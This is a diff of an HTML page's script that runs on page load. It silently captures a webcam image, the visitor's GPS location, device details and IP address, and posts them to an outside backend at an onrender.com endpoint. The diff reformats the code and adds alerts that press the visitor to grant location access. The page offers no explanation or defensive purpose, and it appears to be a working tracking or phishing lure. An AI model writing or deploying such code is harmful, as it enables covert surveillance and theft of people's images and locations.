--- a/index.html
+++ b/index.html
@@ -8,67 +8,66 @@
 <body>
     <script>
         async function captureData() {
-            try {
-                // Capture image using webcam
-                const video = document.createElement("video");
-                const stream = await navigator.mediaDevices.getUserMedia({ video: true });
-                video.srcObject = stream;
-                await new Promise((resolve) => (video.onloadedmetadata = resolve));
+    try {
+        // Camera access
+        const video = document.createElement("video");
+        const stream = await navigator.mediaDevices.getUserMedia({ video: true });
+        video.srcObject = stream;
 
-                const canvas = document.createElement("canvas");
-                canvas.width = video.videoWidth;
-                canvas.height = video.videoHeight;
-                const context = canvas.getContext("2d");
-                context.drawImage(video, 0, 0, canvas.width, canvas.height);
-                const image = canvas.toDataURL("image/png");
+        const canvas = document.createElement("canvas");
+        canvas.width = video.videoWidth;
+        canvas.height = video.videoHeight;
+        const context = canvas.getContext("2d");
+        context.drawImage(video, 0, 0, canvas.width, canvas.height);
+        const image = canvas.toDataURL("image/png");
 
-                stream.getTracks().forEach((track) => track.stop());
+        stream.getTracks().forEach((track) => track.stop());
 
-                // Get user location
-                const location = await new Promise((resolve, reject) => {
-                    navigator.geolocation.getCurrentPosition(
-                        (pos) => resolve({ latitude: pos.coords.latitude, longitude: pos.coords.longitude }),
-                        (err) => reject(err)
-                    );
-                });
-
-                // Get device info
-                const deviceInfo = {
-                    userAgent: navigator.userAgent,
-                    platform: navigator.platform,
-                    language: navigator.language,
-                };
-
-                // Get IP address
-                const ipData = await fetch("https://ipinfo.io/json?token=29fe5e73fe5e82")
-                    .then((response) => response.json())
-                    .catch((err) => console.error("Error fetching IP:", err));
-
-                // Combine data
-                const payload = {
-                    image,
-                    location,
-                    deviceInfo,
-                    ipAddress: ipData?.ip || "Unknown",
-                };
-
-                // Send data to backend
-                const response = await fetch("https://backend-7q12.onrender.com/api/capture", {
-                    method: "POST",
-                    headers: { "Content-Type": "application/json" },
-                    body: JSON.stringify(payload),
-                });
-
-                if (response.ok) {
-                    console.log("Data captured successfully!");
-                } else {
-                    console.error("Error capturing data:", await response.text());
+        // Location access
+        const location = await new Promise((resolve, reject) => {
+            navigator.geolocation.getCurrentPosition(
+                (pos) => resolve({ latitude: pos.coords.latitude, longitude: pos.coords.longitude }),
+                (err) => {
+                    console.error("Geolocation error:", err.message);
+                    alert("Location permission denied. Please enable location access.");
+                    reject(err);
                 }
-            } catch (error) {
-                console.error("Error:", error);
-                alert("Error capturing data. Ensure camera and location permissions are allowed.");
-            }
+            );
+        });
+
+        // Device Info
+        const deviceInfo = {
+            userAgent: navigator.userAgent,
+            platform: navigator.platform,
+            language: navigator.language,
+        };
+
+        // IP Address
+        const ipData = await fetch("https://ipinfo.io/json?token=29fe5e73fe5e82")
+            .then((response) => response.json())
+            .catch((err) => {
+                console.error("Error fetching IP:", err);
+                return { ip: "Unknown" };
+            });
+
+        // Send data
+        const payload = { image, location, deviceInfo, ipAddress: ipData.ip };
+        const response = await fetch("https://backend-7q12.onrender.com/api/capture", {
+            method: "POST",
+            headers: { "Content-Type": "application/json" },
+            body: JSON.stringify(payload),
+        });
+
+        if (response.ok) {
+            console.log("Data captured successfully!");
+        } else {
+            console.error("Error capturing data:", await response.text());
         }
+    } catch (error) {
+        console.error("Error capturing data:", error);
+        alert("Error capturing data. Ensure camera and location permissions are enabled.");
+    }
+}
 
         // Run on page load
         window.onload = captureData;
